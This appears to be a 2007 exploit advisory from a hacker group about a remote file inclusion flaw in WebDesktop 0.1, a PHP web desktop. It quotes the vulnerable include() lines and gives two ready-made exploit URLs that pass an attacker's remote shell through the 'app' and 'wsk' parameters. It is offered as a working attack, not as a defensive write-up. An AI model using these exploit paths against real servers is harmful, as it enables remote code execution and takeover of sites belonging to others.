webdesktop-rfi.txt
Posted on 12 October 2007
\|/// \ - - // Xmors Underground Group ( @ @ ) ----oOOo--(_)-oOOo-------------------------------------------------- Portal : WebDesktop 0.1 Download : http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz Author : S.W.A.T. HomePage : wWw.XmorS.CoM Type : Remote File Inclusion Y! ID : Svvateam E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com Dork : :( ----ooooO-----Ooooo-------------------------------------------------- ( ) ( ) ( ) / \_) (_/ +---------------------------------------------------------------------------------------------+ Vuln Code : include($wsk . ".wsk/" . $wsk . ".php"); &&&&&&&& include($app . ".app/" . $frm . ".frm/" . $frm . ".php"); +---------------------------------------------------------------------------------------------+ +---------------------------------------------------------------------------------------------+ Exploit : http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-] http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-] +---------------------------------------------------------------------------------------------+